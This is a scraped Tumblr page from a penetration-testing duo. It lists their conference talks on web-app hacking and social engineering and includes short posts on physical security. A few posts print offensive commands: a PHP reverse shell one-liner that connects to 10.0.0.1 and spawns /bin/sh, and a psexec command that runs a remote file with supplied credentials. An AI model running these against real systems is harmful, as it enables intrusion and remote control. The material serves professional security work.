We Have Moved...
We have a new website, and no longer post updates on Tumblr. Visit www.wehackpeople.com for the most recent posts and info.

izzy's playlists!
I'd rather be in outer space đ¸

PR's Tumblrdome

if i look back, i am lost

romaâ

â
h
d e v o n
Cosmic Funnies
Misplaced Lens Cap
"I'm Dorothy Gale from Kansas"

⣠Chile in a Photography âŁ

blake kathryn
occasionally subtle

Andulka
Show & Tell
we're not kids anymore.
hello vonnie

ellievsbear
Sade Olutola
seen from Brazil
seen from Brazil

seen from United States

seen from France
seen from United States
seen from United States

seen from United States
seen from United States

seen from United States
seen from United States
seen from United States
seen from United States
seen from United States
seen from United States
seen from United States

seen from United States
seen from United States

seen from United States
seen from Malaysia

seen from Italy
@wehackpeople
We Have Moved...
We have a new website, and no longer post updates on Tumblr. Visit www.wehackpeople.com for the most recent posts and info.
My #Hack5 LAN Turtle is ready for deployment! Hopefully the tape will be convincing for this #SocialEngineering assessment. --Brent
Speaking Engagement Updates
So, updates..... Looks like the last conference we mentioned was B-Sides Charleston in 2015. Since then, weâve spoken at the following conferences and met incredible people along the way!
B-Sides Nashville - Nashville, TN - 4/16/2016 âForging Your Identity -- Credibility Beyond Wordsâ Brent & Tim Video Link: https://www.youtube.com/watch?v=5xyApVBRnio
AIDE - Marshall Univ - Huntington, WV - 4/21/2016 âHacking Web Apps (v2)â Brent & Tim Video Link: https://www.youtube.com/watch?v=WXd4cxw9uDk
NolaCon - New Orleans, LA - 5/20/2016 âHacking Web Apps (v2)â Brent Video Link: https://www.youtube.com/watch?v=pwqqVlSJeNI
Techno Security Con - Myrtle Beach, SC - 6/7/2016 âHacking Web Apps (v2)â Brent & Tim Video Link: N/A
TakeDownCon--Rocket City - Huntsville, AL - 7/19/2016 âHacking Web Apps (v2)â Brent Video Link: N/A
âTrust, yet verifyâ - A Social Engineering Assessment - Brent White
Here is a blog post I wrote recently for work regarding a social engineering / physical security assessment that I performed:
https://www.solutionary.com/resource-center/blog/2016/02/social-engineering-assessment/
B-Sides Charleston - 2015 - Tim Roberts & Brent White âHacking Web Apps (v2)â
Tim and I enjoyed B-Sides. The location was excellent and people were very nice as well. It was great to have conversations during our talk as well as afterwards. Thanks for having us out!
If youâre interested in watching the talk, here is the link: https://www.youtube.com/watch?v=-W3bJ_FtGjE
PhreakNIC 2015 - Nashville, TN - Brent White âHacking Web Appsâ
PhreakNIC was another cool setting, smaller hacker con. It was nice to be able to have open conversations during my talk. Another great part of this was being on the Hacker 101 panel that evening. Iâm glad that section wasnât recorded. There were some very âinterestingâ topics and it certainly felt like an old-school hacker meetup where you talk about anything from hacking to politics to religion. It was a great experience and Iâm hoping to be back next year.
My talk:
Hacking 101 panel. (Iâm on the left end of the table. You can see part of my maroon shirt.)
SaintCon 2015 - Brent White âIntro to Hacking Web Appsâ
SaintCon was pretty awesome. It was nice being out in Ogden, UT for a few days as well. Such a beautiful area. The con was held in a very nice building at Weber State University and I have to say that it was one of the most well organized cons that Iâve been to. I appreciate the staff for letting me come out and speak.Â
If youâre interested in watching the video and listening to some of the great questions that were asked at the end, here is the link:
https://www.youtube.com/watch?v=SCPS2QPmMaw
This screenshot is from the slide where I mention that a vulnerability scan is NOT a penetration test. And, to those who say it is, youâre wrong. :)
SkyDogCon - 2015 - Brent White âHacking Web Appsâ
SkyDogCon in Nashville has such a cool format and atmosphere! During my talk, there was another stage to my right with a couch on it. Ir0nGeek (Adrian Crenshaw) and a few others sat on it and asked questions/trolled me during my talk. It was fun! It felt more like a conversation with friends in a living room instead of presenting at a con. The talk was very open and I was able to get into some good convo with many people. Awesome! SkyDog is just so freaking tall though and had made podium himself, so of course, my laptop came up to the top of my head. I had to stand to the side to see everyone. Haha! #ShortPeopleProblems
The CTF was also pretty fun. I enjoyed picking away at that as time allowed.
If youâre interested in watching the talk and listening to the questions and conversations, here is a link: https://www.youtube.com/watch?v=M8quKKC3-m4
DerbyCon 5.0 - Brent White âHacking Web Appsâ
Brent here.
DerbyCon 5 - 2015 was awesome! I presented my talk âHacking Web Appsâ and really enjoyed the amount of questions that people asked during the Q&A portion at the end.
If youâre interested in watching my talk, here is the link: https://www.youtube.com/watch?v=J1tHFEc09u0
DJ Rance doing his thing:
She loved all of the blinky lights. This pic of us actually made it into the DerbyCon closing ceremony video. So, thatâs cool!
Dancing to DJ Rance
4yr old with lock picking skills
Execute file hosted on remote system w/ creds:
> psexec /accepteula \\<TargetIP> -u domain\user -p pass -c -f \\<smbIP>\share\file.exe
Doing an assessment and want to capture some hashes? Here's 10 methods you can try to get a user to authenticate to you over SMB.
Hacking Your Hotel Roomâs Thermostat
How to override your hotel's thermostat and disable the motion sensor to it as well:
http://viewfromthewing.boardingarea.com/2013/11/10/override-hotels-thermostat-controls-make-cool-hot-youd-like/
Preview: PhotoBump - Working plastic bump keys for any profile
This is a pretty awesome concept from decoder (@ mozdeco) that allows you to create a working bump key only using a photo of the keyway and the manufacturer specific details about the lock series.
http://unlocked.own-hero.net/2014/07/10/preview-photobump-plastic-bumpkeys/
DEF CON 23 - Brent White âHacking Web Appsâ
Brent here.Â
If youâre going to be at DEF CON 23, Iâm speaking on Thursday at 11am on hacking web apps. Come on by if youâre able and check it out! Iâll be available for questions afterwards.
UPDATE:
That was a blast! Iâm glad that there was such a great turnout as well as so many questions during the Q&A. Thanks to all of the Solutionary guys who came to the talk as well. It was cool to have an âentourageâ for a few minutes.
âDonât get nervous...â
Full room!
I also had the opportunity to interview with BBC News before entering for my talk:
The Solutionary entourage:
What a great experience!
âFirst Time Speakerâ shot on stage:
CircleCityCon - Indianapolis, IN - 2015
CircleCityCon in Indianapolis! DrBearSec knows how to put on a great hacker conference. Thanks for having Tim and I out to speak.
Our talk was titled âFrom Parking Lot to Pwnage - Hack-free Network Pwnageâ. We did a bit of a different format with this talk. Youâll notice weâre sitting in chairs. The more informal, conversational approach is what we were aiming for and we feel as though it went well. Thanks to those who participated as well as asked questions!
Here is the link to our talk if youâre interested in watching: https://www.youtube.com/watch?v=LORSYVD2rYk
https://circlecitycon.com/
The partys were great, the response during our talk was excellent as well. Thank you to everyone that listened to Tim and I speak about social engineering, physical security, OSINT and more.Â
Weâll see you at DEF CON 23!
PHP Reverse Shell
 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Physical Security Assessments?
So, this guy apparently didnât plan this out very well. Otherwise, he would have learned his exits through basic reconnaissance. LOL!